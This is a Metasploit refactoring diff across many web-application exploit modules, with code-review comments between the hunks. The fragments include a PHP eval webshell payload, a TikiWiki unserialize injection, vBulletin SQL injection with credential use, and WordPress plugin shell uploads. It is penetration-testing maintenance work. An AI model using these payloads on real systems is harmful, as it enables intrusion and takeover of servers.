@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index a1ba47c228..4d46b0051f 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index b54648b7f0..0839e46091 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end 
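Review bot: The rescue branch in tikiwiki_unserialize_exec.rb (hunk at -66,11) interpolates `f`, but the lines shown only ever use `@upload_php`, so unless `f` is defined above the hunk the error path raises NameError instead of printing the message. `print_error("Unable to remove #{@upload_php}")` matches the two lines before it. The bare `rescue` also drops the reason; `rescue => e` with `e.message` appended would keep it. The method starts outside the hunk.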
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" - print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem") + print_status("Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => normalize_uri(base, "tiki-rss_error.php") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote return else tiki_path = $1 - print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}" + print_good "Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") + print_error("Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_cgi( { @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 817d0d3a3e..777ae27a6c 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb 
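Review bot: In tikiwiki_unserialize_exec.rb (hunk at -117,11) the guard `if not res or res.code != 200` is entered when `res` is nil, and the message then calls `res.code`, which raises NoMethodError on a timeout. Using `#{res ? res.code : 'no response'}` in the message, or handling the nil case in its own branch, avoids it. The enclosing method starts before this hunk and continues after it.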
@@ -6,7 +6,7 @@ # -*- coding: utf-8 -*- require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/ diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 037463b905..56144a5917 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def do_login() - print_status("#{peer} - Logging in...") + print_status("Logging in...") username = datastore['USERNAME'] password = datastore['PASSWORD'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") res.get_cookies end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the PHP object injection...") + print_status("Exploiting the PHP object injection...") exec_php(payload.encoded) end end diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 0e2e00d06c..6cc5113f2e 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index c371316749..73207fd2a9 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 95ed12f2fe..183f696ffb 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index da87cb4613..6f94c0aa4e 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end 
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -356,18 +356,18 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(session) - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end 
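Review bot: The uninstall sequence in `on_new_session` (vbulletin_vote_sqli_exec.rb, hunk at -356,18) is repeated line for line at the end of `exploit` in the -497,18 hunk: fetch the delete token, report failure, delete the product, report the result. Moving it into one private helper that both call would keep the copies from drifting, which matters because this is the code that removes the installed product from the target after a test. "Failed uninstall the product" is also missing a "to" in both places.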
@@ -425,22 +425,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.empty? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i users = [] - print_good("#{peer} - #{count_users} users found") + print_good("#{count_users} users found") for i in 0..count_users - 1 user = get_user_data(node_id, i) @@ -466,10 +466,10 @@ class Metasploit3 < Msf::Exploit::Remote @session = nil users.each do |user| - print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...") + print_status("Trying to log into vBulletin admin control panel as #{user[0]}...") @session = do_login(user[0], user[1]) unless @session.blank? - print_good("#{peer} - Logged in successfully as #{user[0]}") + print_good("Logged in successfully as #{user[0]}") break end end @@ -478,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel") end - print_status("#{peer} - Getting the install product security token...") + print_status("Getting the install product security token...") install_token = get_install_token if install_token.nil? fail_with(Failure::Unknown, "#{peer} - Failed to get the install token") 
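Review bot: `for i in 0..count_users - 1` in vbulletin_vote_sqli_exec.rb's `exploit` (hunk at -425,22) leaks `i` into the method scope and is not the usual Ruby form; `count_users.times do |i|` does the same. `data.to_i` also turns any non-numeric reply into 0, so "0 users found" is printed for a malformed response; a check such as `data =~ /\A\d+\z/` before the conversion would tell those cases apart. The loop body continues outside the hunk.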
@@ -486,9 +486,9 @@ class Metasploit3 < Msf::Exploit::Remote @session_hash = install_token[:session_hash] @product_id = rand_text_alpha_lower(5 + rand(8)) - print_status("#{peer} - Installing the malicious product #{@product_id}...") + print_status("Installing the malicious product #{@product_id}...") if install_product(install_token) - print_good("#{peer} - Product successfully installed... payload should be executed...") + print_good("Product successfully installed... payload should be executed...") else # Two situations trigger this path: # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often. @@ -497,18 +497,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 652d68b0fe..01ea8823c6 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -154,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ - vprint_error("#{peer} - Invalid Username or Password.") + vprint_error("Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ - vprint_error("#{peer} - Web client session not found") + vprint_error("Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking if injection is possible...") + print_status("Checking if injection is possible...") res = request('ls -a .') unless res and res.code == 200 @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? - print_error("#{peer} - Valid web client session not found, trying to create one...") + print_error("Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") end - print_good("#{peer} - Exploitation looks feasible, proceeding... ") + print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end 
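Review bot: `print_error("Valid web client session not found, trying to create one...")` in vicidial_manager_send_cmd_exec.rb (hunk at -181,7) reports a recoverable condition as an error and the module then carries on, so `print_status` or `print_warning` fits better. In the -193,7 hunk, `request("#{payload.encoded}", 1)` wraps the value in an interpolation that appears to have no effect, and the `print_good` message ends with a stray space before the closing quote. The `exploit` method spans several hunks and is not fully visible.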
diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 29c80dd4bf..c058cbf271 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Attempting to login...") + vprint_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.get_cookies =~ /sid/ - vprint_good "#{peer} - Authentication successful" + vprint_good "Authentication successful" session = res.get_cookies.split("sid=")[1].split(";")[0] else - vprint_error "#{peer} - Service found, but authentication failed" + vprint_error "Service found, but authentication failed" return Exploit::CheckCode::Detected end - vprint_status("#{peer} - Attempting to execute...") + vprint_status("Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" 
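Review bot: The local `peer = "#{rhost}:#{rport}"` in webmin_show_cgi_exec.rb (hunks at -63,7 and -106,7) is no longer read by any line shown once the `#{peer} - ` prefixes are removed. If nothing further down the two methods uses it, the assignment can be deleted; if a later `fail_with` still does, a comment noting that would explain why it stays. The other modules in this diff use `peer` without assigning it, so the local presumably shadows a helper of the same name. Both methods start outside their hunks.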
@@ -121,18 +121,18 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to execute the payload...") + print_status("Attempting to execute the payload...") command = payload.encoded @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - print_good "#{peer} - Payload executed successfully" + print_good "Payload executed successfully" else - print_error "#{peer} - Error executing the payload" + print_error "Error executing the payload" return end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 7d6f169d17..bf55cd2c70 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
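Review bot: `print_good "Authentication successfully"` now appears twice on the success path of the `@@ -121,18` hunk, once inside `if session and not session.empty?` and again right after its `end`, so a successful login is reported twice. Removing the second call and correcting the wording to `print_good "Authentication successful"` would be enough. The `|| ''` on the `scan` result also means `session` is never nil, which makes the `session and` half of the condition redundant. The method starts outside the hunk.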
@@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - vprint_status("#{peer} - Found version: 5.1.20101016") + vprint_status("Found version: 5.1.20101016") return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - vprint_status("#{peer} - Found version: #{$1}") + vprint_status("Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cppassword', 'cpdomain' ] - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...") + print_status("Sending payload (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install2.php'), @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 and res.body =~ /Failed to connect to database server/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::Unknown, "#{peer} - Something went wrong") end diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 7c9f49e32a..1b498ca2ea 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper 
@@ -68,22 +68,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded - print_status("#{peer} - Executing the payload at #{payload_uri}...") + print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 008317ea7f..b76d8d9fdd 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
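Review bot: `print_status("Authenticating with WordPress using #{username}:#{password}...")` at the top of the `@@ -68,22` hunk writes the account password in clear text to the console, and from there into any saved console log or pasted output. Printing only the account name is enough to follow the run: `print_status("Authenticating with WordPress as #{username}...")`. The same pattern is in the `@@ -111,29` hunk of wp_easycart_unrestricted_file_upload.rb and the `@@ -72,17` hunk of wp_photo_gallery_unrestricted_file_upload.rb. Separately, `payload_name = "#{Rex::Text.rand_text_alpha(10)}"` does not need the interpolation.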
diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 9f07c15816..247a904595 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -76,20 +76,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Trying to login as #{username}") + vprint_status("Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? - vprint_status("#{peer} - Trying to get nonce") + vprint_status("Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? - vprint_status("#{peer} - Trying to upload payload") + vprint_status("Trying to upload payload") # This must be default.php filename = 'default.php' - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file") + print_status("Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 9d0cbd7ce6..fec5e636cb 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb 
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'), @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f09d836152..f9ac0917a8 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 3504f81df9..711a3c81ec 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"") - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'post.php'), @@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/ uploaded_filename = res.body register_files_for_cleanup(uploaded_filename) - print_status("#{peer} - File #{uploaded_filename} successfully uploaded") + print_status("File #{uploaded_filename} successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename) - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( { 'uri' => file_path, 
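Review bot: In the `@@ -61,14` hunk of wp_downloadmanager_upload.rb the check `res.body =~ /#{Regexp.escape(filename)}$/` passes when any line of the response ends with the name, because `$` anchors at a line end, and the next line then takes the whole body as `uploaded_filename`. A multi-line or padded response would therefore be registered for cleanup and joined into `file_path` verbatim. Matching a stripped copy against `\z` limits the value to the single name expected: `uploaded_filename = res.body.strip`, tested with `/#{Regexp.escape(filename)}\z/`. The method continues outside the hunk.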
diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 9d554ee3e2..714471ec6b 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper 
@@ -111,29 +111,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication - vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + vprint_status("WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication - print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + print_status("Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + print_warning("Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") end end - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" 
